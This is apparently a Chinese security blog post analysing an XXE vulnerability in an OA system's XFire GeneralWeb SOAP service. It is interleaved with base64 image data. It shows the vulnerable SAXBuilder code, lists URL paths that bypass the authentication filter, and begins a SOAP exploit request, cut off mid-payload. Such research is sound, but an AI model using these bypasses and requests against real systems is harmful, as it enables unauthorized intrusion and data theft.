3xruY9Ydv3FeryVdnZuecNrP9biJ6XlitZbmiZ4smq+cV50YA+HoKRoRvV2wwId6IJza9cXz75vzTVk3B2Oozy+cNOwH0fyTwXN7BnhOAPQiIhsR/ZVveX4jIvrTf/+3v+V9/2uI5gEAAJzhWykJxfOZFyl2L05bcDhtBQPvUimUKYBaCzHG0kDLANNOpLcAfN8ACgAAAAAAAAAAAAAAAIB7MVsgeQ8BJqhlS/xZRHy7y9V/FPkhIp7YdM18lLHinvsjYmI5Wuw9c0Ok3Lh00scG35QfLjMn5Vojwhxqwb/BP058IypbcM4JwksW1n2Bafw8fTe5cyU3qXCIuKJ8sJl+DDh1Q5R0F/hxA9F8n3/r2g1XmnI1n6mn9Kf/H9PhOvPdWJl31ufXzf2avFmqv0b8+cwWaqvFVzTfYv/S6XkVWJwtgnyi7zmdsmnRvD5QbovBjwZ9cwDApxGRjfj7r//X//h3vyUi+kVE9PVf/+4vhfg3n40aAACAXsyLzOzOpoiogTFha+XcHCNS4vlNRSR0yKwGJfUnsxOBC3Ng7dxzNO9GHoZI/Tv/RkTfneHs55cAAAAAAAAAAAAAAAAAAEOYPqdhrPSCJsxzWSq2FO87x+e5WVR49MOwzoCTMypVGWAsYgwsS587SRqs0hekioIv1i+liRNpHx/C1TI8QvR6LQ5MREJbZV2RE6wz82kWtdLmyI+Uj0Z8nFuocBbTQOReQ6SX5Ya687ki+bS72dWeDVNC8bKLirdMQT8HU06CuKmsqxFSonnxrtFW582liyq+pE7gLbzE9pzTHUg6v2cF80Ql0bxfN63uR7yJ9eJyW0sQ+swAgJ+AiPzmf/j93/0l0R/9L9s/+Xf/5Y9Ztj//dKQAAAB04r1wrHr5iAXWgeX5jBtjnSFldX7Vy/oT6X2m2EIGAAAAAAAAAAAAAABwxpvGEd90LzFvvjdwL3zB1up85wvN/b9ev3IWileQ2om5ldCifP4aorJO1Z6q3NXYsGW+O39niubLCwbsVSPmF2vXNZxaeR8TkLFKnzs3JpQTPyqnJnvy913as1xaVsevZ8FA8UhonzuIn7E6XygvPkZAb6zN7/QazTeIGF6eOkTzHP+Ovv9UFchzrKs/JZ4AADCOPwj/+T//v37/x7/4m3+3036X/ikAAICL+BbgZ7rpJWV13hxPW54HPiJMnBix2shftKAtZCyID6zUAwAAAAAAAAAAAIAfQ8vWkB0w1YvVRiFC2tLu83nz8PKbntPqPP5TSc0jnLu5nsn6/NDzHkXBXkscBniS9XtdQWwJK9U8KcvPlFTMhtbm84slJCHijqW+/aidBKpE/+0+V19YM5dWEs2PNA5W8mlV3uu5p5b5yFSeOoNzGVmfbe+epd0E5aLKl0Y8EbELyu2CcbT0z+5idsbWPJN66l9PJC/mqP7uLp3bh30adxU1N8/tdwnTS+Up7yYnmvfjkNz5RGtDZnLTx9nMXfMluAPIG5+AmbFzxmuR7f///d//7tc37X+G4gUAAO8ibrxrtjpMNfizOue+yNvvbIh5sRKJhODAH89gYZJo0FtYrLWQjYi+TzvPov1qjEcwaINOIgAAAAAAAAAAAAD4YUycOFW6qHWzdmYM9k1zwW+0FLbqOX3KMvdMzLD5m8T6KaPhPSL54YLfDr+UsNsJ6nr8WKUx24hbDbY3cXU+biOKROi+xV/1KRKWBWEKLPozc3HWx83beUaxTrLeRvG80pHYD9ZidiY+1YmdptpJum5GkVy481w5KaVX/DyF5LQeyuWB0hxv0k1jY3GMaxvp3Qis5/lzDW7cPR3P2fATES/lPVNmauLXVzfV7jDgPk1uJGYS2yNkK4QnslJ5696K5vVRY2GeyZuLb479e6nRTHyKql027Je2ewjdifk/f110NCWaN/6lRPOx2HS+IPy8Lp/JzD
之前实战遇到了但是网上的poc懂得都懂索性就专门研究一下</p>
<p blockindex=1>JDK版本1.6.0<br>
操作系统Windows Server 2012</p>
<h2 blockindex=2>漏洞分析</h2>
<p blockindex=3>从web.xml看起</p>
<p blockindex=4><img src="data:image/png;base64,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
<p blockindex=5>使用了 XFire 与 Axis 两种 WebService 框架</p>
<p blockindex=6>看到 XFire 配置文件<code>D:/jboss/jboss-as/server/oa/deploy/defaultroot.war/WEB-INF/classes/META-INF/xfire/services.xml</code></p>
<p blockindex=7><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABnYAAAIICAYAAABTpdDKAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzdfXwV1b0v/s8asLYWH07b01NB8oCShHNutf5MbAslD6QFHxJqDdZKEIIHiD3HYImtLaFKqCXcWk1PSby3RgpRCKcK2FYSWkFIdjS2kvS2trc/SIBk7whWPGqPJVJoZdb9Y2b2npk9s593dnb4vF+v+JJkHtbMrFkzs77rQUgpEcIVIyMj8xVFKZdSTlMUZbKqqpNCrUBERERERERERERERESRURRlRFXV14UQg6qq7p40adJzAI67LS+cAjunT5+erKrqOkVR7pJSKslMMBEREREREREREREREWmEEKqqqpsVRVl70UUXvR70d3tg5/Tp0/OllG0A2DOHiIiIiIiIiIiIiIgoNUaEEJUXXXTRc+ZfWnrjjIyMrATwUzCoQ0RERERERERERERElEqTAPxUj934+XvsnD59ej6An3LoNSIiIiIiIiIiIiIiorFBCKEC+JLRc0dIKXH69OnJUsp+sKcOERERERERERERERHRWDMihMi96KKLXlcAQFXVdWBQh4iIiIiIiIiIiIiIaCyapMdyIKSUV5w+fdrHIdiIiIiIiIiIiIiIiIjGJiGEetFFF2UqIyMj8xnUISIiIiIiIiIiIiIiGruklMrIyMh8RVGU8lQnhoiIiIiIiIiIiIiIiEJTFKVckVJOS3VCiIiIiIiIiIiIiIiIKDQp5TRFUZTJqU4IERERERERERERERERhaYoymRFVdVJqU4IERERERERERERERERhaaq6iQl1YkgIiIiIiIiIiIiIiKiyDCwQ0RERERERERERERElCYY2CEiIiIiIiIiIiIiIkoTDOwQERERERERERERERGlCQZ2iIiIiIiIiIiIiIiI0gQDO0RERERERERERERERGmCgR0iIiIiIiIiIiIiIqI0wcAOERERERERERERERFRmmBgh4iIiIiIiIiIiIiIKE1MTHUCiGhsUFUVb7zxBt566y289957kFKmOklERERERERERDSKhBD48Ic/jH/8x3/EP/3TP0FR0rNfgFHPdfLkSZw6dYr1XJQSQghcfPHF+MQnPpHw+0mMjIwwVxOd5/72t7/h0KFDOH36dKqTQkREREREREREY8BFF12EGTNm4AMf+ECq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
<p blockindex=8>配置了一个GeneralWeb的服务找到该类<code>com.whir.service.webservice.GeneralWeb</code></p>
<pre blockindex=9><code class="hljs language-java"><span class=hljs-keyword>package</span> com.whir.service.webservice;
<span class=hljs-keyword>import</span> com.whir.service.common.CallApi;
<span class=hljs-keyword>public</span> <span class=hljs-class><span class=hljs-keyword>class</span> <span class=hljs-title>GeneralWeb</span> </span>{
<span class=hljs-function><span class=hljs-keyword>public</span> String <span class=hljs-title>OAManager</span><span class=hljs-params>(String input)</span> <span class=hljs-keyword>throws</span> Exception </span>{
CallApi callapi = <span class=hljs-keyword>new</span> CallApi();
<span class=hljs-keyword>return</span> callapi.getResult(input);
}
}
</code></pre>
<p blockindex=10><code>com.whir.service.common.CallApi#getResult</code></p>
<pre blockindex=11><code class="hljs language-java"><span class=hljs-function><span class=hljs-keyword>public</span> String <span class=hljs-title>getResult</span><span class=hljs-params>(String input)</span> <span class=hljs-keyword>throws</span> Exception </span>{
<span class=hljs-keyword>if</span> (serviceMap == <span class=hljs-keyword>null</span>) {
<span class=hljs-keyword>throw</span> <span class=hljs-keyword>new</span> Exception(<span class=hljs-string>"Error: serviceMap can not is null"</span>);
}
SAXBuilder builder = <span class=hljs-keyword>new</span> SAXBuilder();
<span class=hljs-keyword>byte</span>[] b = input.getBytes(<span class=hljs-string>"utf-8"</span>);
InputStream is = <span class=hljs-keyword>new</span> ByteArrayInputStream(b);
Document doc = builder.build(is);
Element root = doc.getRootElement();
</code></pre>
<p blockindex=12>使用SAXBuilder进行解析并且未进行过滤产生XXE漏洞</p>
<p blockindex=13>鉴权方面代码在<code>com.whir.common.util.SetCharacterEncodingFilter</code></p>
<p blockindex=14><img src="data:image/png;base64,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
<p blockindex=15>使用的是 getRequestURI那么就有很多绕过方法了简单列举几个</p>
<pre blockindex=16><code class="hljs language-php">/iWebOfficeSign/OfficeServer.jsp/../../
/xfservices/./GeneralWeb
.jsp;.js
</code></pre>
<h2 blockindex=17>漏洞利用</h2>
<p blockindex=18>触发dnslog</p>
<pre blockindex=19><code class="hljs language-php">POST /defaultroot/xfservices/./GeneralWeb HTTP/<span class=hljs-number>1.1</span>
Host:
User-Agent: Moziilla/<span class=hljs-number>5.0</span> (Linux; U; Android <span class=hljs-number>2.3</span>.<span class=hljs-number>6</span>; en-us; Nexus S Build/GRK39F) AppleWebKit/<span class=hljs-number>533.1</span> (KHTML, like Gecko) Version/<span class=hljs-number>4.0</span> Mobile Safari/<span class=hljs-number>533.1</span>
Content-Type: text/xml;charset=UTF-<span class=hljs-number>8</span>
SOAPAction:
Content-Length: <span class=hljs-number>457</span>
&lt;soapenv:Envelope xmlns:soapenv=<span class=hljs-string>"http://schemas.xmlsoap.org/soap/envelope/"</span> xmlns:gen=<span class=hljs-string>"http://com.whir.service/GeneralWeb"</span>&gt;
&lt;soapenv:Body&gt;
&lt;gen:OAManager&gt;
&lt;gen:input&gt;
&amp;lt;?xml version=<span class=hljs-string>"1.0"</span> encoding=<span class=hljs-string>"UTF-8"</span>?&amp;gt;
